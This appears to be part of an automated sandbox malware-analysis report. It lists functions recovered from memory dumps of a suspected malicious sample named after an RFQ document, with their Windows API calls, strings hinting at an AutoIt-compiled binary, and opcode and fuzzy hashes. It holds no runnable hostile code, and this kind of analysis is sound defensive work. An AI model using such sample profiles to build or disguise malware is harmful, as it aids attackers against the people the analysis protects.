                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                              • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                              • API String ID: 1943609520-557222456
                                              • Opcode ID: fd7625a258661f774721bbfa458835724f597b558d1d87cd356a44f0b3ed2851
                                              • Instruction ID: d2b3fdb86b32427a5cf2988ac2b23915ffc2859f11bc12959b4e0123830af2c1
                                              • Opcode Fuzzy Hash: fd7625a258661f774721bbfa458835724f597b558d1d87cd356a44f0b3ed2851
                                              • Instruction Fuzzy Hash: D791BD311083559FCB28EF24D995CBEB7E4EF95710F04091EF986A72A2DB60EE04CB52
                                              Function 0010524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                              Download Yara Rule
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 001052DD
                                                • Part of subcall function 00110340: __87except.LIBCMT ref: 0011037B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorHandling__87except__start
                                              • String ID: pow
                                              • API String ID: 2905807303-2276729525
                                              • Opcode ID: 513ca2a6b8a92b3f8c479f60083a207dc149040491020d1c51bc2dc3fa776f14
                                              • Instruction ID: 62ee1c773fdba025290c376b23f8505408894bd80193c899ff06db6e4fe872ca
                                              • Opcode Fuzzy Hash: 513ca2a6b8a92b3f8c479f60083a207dc149040491020d1c51bc2dc3fa776f14
                                              • Instruction Fuzzy Hash: E2514831E1D60287CB1A6714C9813AF2B95AB14750F204978E0D98AAE5EFF48CD49E46
                                              Function 0010023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: #$+
                                              • API String ID: 0-2552117581
                                              • Opcode ID: dda348b537d3519642c8d344dbb9ef72a8ecb004ef47ff50a33e9f642749fedb
                                              • Instruction ID: 673dc6cf645acffc64c8571da1f375769be0d0d1520592cde7e9b5a15e470150
                                              • Opcode Fuzzy Hash: dda348b537d3519642c8d344dbb9ef72a8ecb004ef47ff50a33e9f642749fedb
                                              • Instruction Fuzzy Hash: C7513174504686CFCF169FA8C8886FA7BA5FF19710F184055EC91AF2E0DB709D42CB60
                                              Function 000F62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memset$_memmove
                                              • String ID: ERCP
                                              • API String ID: 2532777613-1384759551
                                              • Opcode ID: 3e2d3382db4eea230d4244c90edab5ba7093333957fef153940bf149f0f8760e
                                              • Instruction ID: b32f600b88b9c2f005f90a2b96da91e66766b10440316f578ba231fad5a570ba
                                              • Opcode Fuzzy Hash: 3e2d3382db4eea230d4244c90edab5ba7093333957fef153940bf149f0f8760e
                                              • Instruction Fuzzy Hash: 8051A2719003099BDB24DF65C9817EABBF4EF04714F24856EEA4AD7641E771AA84CB40
                                              Function 00167648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001676D0
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001676E4
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00167708
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: SysMonthCal32
                                              • API String ID: 2326795674-1439706946
                                              • Opcode ID: 479b16d14641e5938634f1d37bfb97579559d65db6be56db3c6eee8ca32812c1
                                              • Instruction ID: b906990808f2a321a03c68b5190415f4b13ffdbcc445a703eb8066521e1db815
                                              • Opcode Fuzzy Hash: 479b16d14641e5938634f1d37bfb97579559d65db6be56db3c6eee8ca32812c1
                                              • Instruction Fuzzy Hash: DB21B232504219BBDF15CFA4DC86FEA3B79EF48718F110214FE156B1D1DBB1A8A18BA0
                                              Function 00166F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00166FAA
                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00166FBA
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00166FDF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$MoveWindow
                                              • String ID: Listbox
                                              • API String ID: 3315199576-2633736733
                                              • Opcode ID: fcc750225f0951296b12270113cedb40d3f3e2ca0cc81eb48cf79428b195e477
                                              • Instruction ID: 1a2bbdc1ba9a756c4b441a0f4c1d6a9614211d19cc23a9d5481238997e3aa987
                                              • Opcode Fuzzy Hash: fcc750225f0951296b12270113cedb40d3f3e2ca0cc81eb48cf79428b195e477
                                              • Instruction Fuzzy Hash: 5421A472614118BFDF158F54EC85FEB37AAEF89754F018164F9149B190C771AC61CBA0
                                              Function 0013912D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0013914F
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00139166
                                              • SendMessageW.USER32(?,0000000D,?,00000000), ref: 0013919E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: 890662a5f3ad44e24c5769ffcb7aeaf08d4988b5deaf12a7f9c6204f89a313b1
                                              • Instruction ID: 90d8fd8227e4f6c40ee241cdefea08555ef743e6aab553ebd18944446b80a3ad
                                              • Opcode Fuzzy Hash: 890662a5f3ad44e24c5769ffcb7aeaf08d4988b5deaf12a7f9c6204f89a313b1
                                              • Instruction Fuzzy Hash: 7B219272604109BBDF20EBA8DC459BEF7BDAF44350F11045AF505E32A0DBB1AD409BA0
                                              Function 001560EC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000402,00000000,00000000), ref: 0015613B
                                              • SendMessageW.USER32(0000000C,00000000,?), ref: 0015617C
                                              • SendMessageW.USER32(0000000C,00000000,?), ref: 001561A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: @U=u
                                              • API String ID: 3850602802-2594219639
                                              • Opcode ID: ce45fce333e4231bcf29f65c38ef6b2f17183edb7c270921e08f0d1212fefac7
                                              • Instruction ID: 489f2b00435b9dc933ec166fb985dad548833197842993ec0a660307156fc6c2
                                              • Opcode Fuzzy Hash: ce45fce333e4231bcf29f65c38ef6b2f17183edb7c270921e08f0d1212fefac7
                                              • Instruction Fuzzy Hash: 26214A75200901EFDB10AB25DD85D6AB7E5FB89311B418059F9199BA72CB60BC91CB90
                                              Function 0016797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001679E1
                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001679F6
                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00167A03
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: msctls_trackbar32
                                              • API String ID: 3850602802-1010561917
                                              • Opcode ID: ec8df5c5f021dd87cb0cfd35d24834f78a111afcf97f2b0fd228b74971c3b910
                                              • Instruction ID: d4a20c79bde2c4c80a8762e809d746ccfa166411e5989ccb729cf4fd9e90934d
                                              • Opcode Fuzzy Hash: ec8df5c5f021dd87cb0cfd35d24834f78a111afcf97f2b0fd228b74971c3b910
                                              • Instruction Fuzzy Hash: F011E372244208BAEF149FB0DC45FEB37A9EF89768F160519FA51A70E1D371A861CB60
                                              Function 00166B8F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00166C11
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00166C20
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: @U=u$edit
                                              • API String ID: 2978978980-590756393
                                              • Opcode ID: e297655c99fc09e653b6494845b557fdc3763951b4e88026fff24e23ac91646f
                                              • Instruction ID: 2e314f4f67040c65f31ed0cfee57a9b621ab543c1fa5d788f3cb885738060975
                                              • Opcode Fuzzy Hash: e297655c99fc09e653b6494845b557fdc3763951b4e88026fff24e23ac91646f
                                              • Instruction Fuzzy Hash: 09118C71604208ABEB108F64DC41AFB3769EB15378F204728F961D71E0C775DCA19B60
                                              Function 001392E7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00139355
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 372448540-2258501812
                                              • Opcode ID: aa919802bb7d8c8126ad894e0e1e4e975d858b896bdb8515ee7619e4f754b6e1
                                              • Instruction ID: e06af53a278592ad8234217fb2a8481161187e56943707ae6d53a8a3d67a388b
                                              • Opcode Fuzzy Hash: aa919802bb7d8c8126ad894e0e1e4e975d858b896bdb8515ee7619e4f754b6e1
                                              • Instruction Fuzzy Hash: 8301B1B1A05214ABDF08EBB5CC918FF7769FF46320F150A29F932672D2EB7159088660
                                              Function 001391DF Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 0013924D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 372448540-2258501812
                                              • Opcode ID: 330bf62c4f899f203fa81e04111c1395ddb652ccff2026ca6a4df843a5fc1cc8
                                              • Instruction ID: d0309066e1a2a43deb66b3b30a2da9bc3fb529b1b998bbd4041a87d24cd43109
                                              • Opcode Fuzzy Hash: 330bf62c4f899f203fa81e04111c1395ddb652ccff2026ca6a4df843a5fc1cc8
                                              • Instruction Fuzzy Hash: BC018471A45204BBDF08EBA4C992DFF73A89F55300F150029B91677292EB515E0C96B1
                                              Function 00139264 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 49windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E7F41: _memmove.LIBCMT ref: 000E7F82
                                                • Part of subcall function 0013B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0013B0E7
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 001392D0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_memmove
                                              • String ID: @U=u$ComboBox$ListBox
                                              • API String ID: 372448540-2258501812
                                              • Opcode ID: 90ad0ea03b9acd29332421195a714c6287b5d221a4bb4027f684e50773ae843a
                                              • Instruction ID: 35d8c60707eef6de5f2b6940223a60a72449a335d99e9f04a22992d124260738
                                              • Opcode Fuzzy Hash: 90ad0ea03b9acd29332421195a714c6287b5d221a4bb4027f684e50773ae843a
                                              • Instruction Fuzzy Hash: 9301D671A452087BDF04EBA4CD82EFF77AC9F15300F290129B92277282EB615F0C9672
                                              Function 0016AF89 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32(?,001A67B0,0016DB17,000000FC,?,00000000,00000000,?,?,?,0011BBB9,?,?,?,?,?), ref: 0016AF8B
                                              • GetFocus.USER32 ref: 0016AF93
                                                • Part of subcall function 000E2612: GetWindowLongW.USER32(?,000000EB), ref: 000E2623
                                                • Part of subcall function 000E25DB: GetWindowLongW.USER32(?,000000EB), ref: 000E25EC
                                              • SendMessageW.USER32(00F1EBE8,000000B0,000001BC,000001C0), ref: 0016B005
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Long$FocusForegroundMessageSend
                                              • String ID: @U=u
                                              • API String ID: 3601265619-2594219639
                                              • Opcode ID: 691e5bf544202ea4b42fe336ae33c65fd902e44686f873917327d967798cc0e4
                                              • Instruction ID: 5b789e45aaf2456c060c8215e47cf0a0b0cea26cf7a918d489a14a97813fbc0d
                                              • Opcode Fuzzy Hash: 691e5bf544202ea4b42fe336ae33c65fd902e44686f873917327d967798cc0e4
                                              • Instruction Fuzzy Hash: 140144352056109FC7249B38DCC4A6777E9EB8A324B18026DF426C72A1CB316C96CB50
                                              Function 000F61C3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000F619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000F61B1
                                              • SendMessageW.USER32(?,0000000C,00000000,?), ref: 000F61DF
                                              • GetParent.USER32(?), ref: 0013111F
                                              • InvalidateRect.USER32(00000000,?,000F3BAF,?,00000000,00000001), ref: 00131126
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$InvalidateParentRectTimeout
                                              • String ID: @U=u
                                              • API String ID: 3648793173-2594219639
                                              • Opcode ID: 6fd77e8fc52a6b84273c2cc2d531b59eb05ae7e6ffdcfa90e5f09dfa38f2d582
                                              • Instruction ID: 1c5dadbe5fa4783b5c84634dd96841e32ce5b0e39a438c62a6db907e05580c89
                                              • Opcode Fuzzy Hash: 6fd77e8fc52a6b84273c2cc2d531b59eb05ae7e6ffdcfa90e5f09dfa38f2d582
                                              • Instruction Fuzzy Hash: 8CF03035104208FBEF201F60EC09FA57BA8BB15754F285539F6419A8B2C6A75891BB60
                                              Function 000E4C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,000E4C2E), ref: 000E4CA3
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000E4CB5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                              • API String ID: 2574300362-192647395
                                              • Opcode ID: 7d15ba560b1ad7f62a61bc3ab5b00837a481867b1dba3efe988620410f908317
                                              • Instruction ID: 503bcbd53964859122d5f69ca47f0eb7327fc39e66ff160fa47b552ac80a123b
                                              • Opcode Fuzzy Hash: 7d15ba560b1ad7f62a61bc3ab5b00837a481867b1dba3efe988620410f908317
                                              • Instruction Fuzzy Hash: E8D01730510723CFD7609F32EE1960676E5AF06791B228C3ED886E6550E7B0D8C1CA50
                                              Function 000E4D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,000E4D2E,?,000E4F4F,?,001A62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000E4D6F
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000E4D81
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
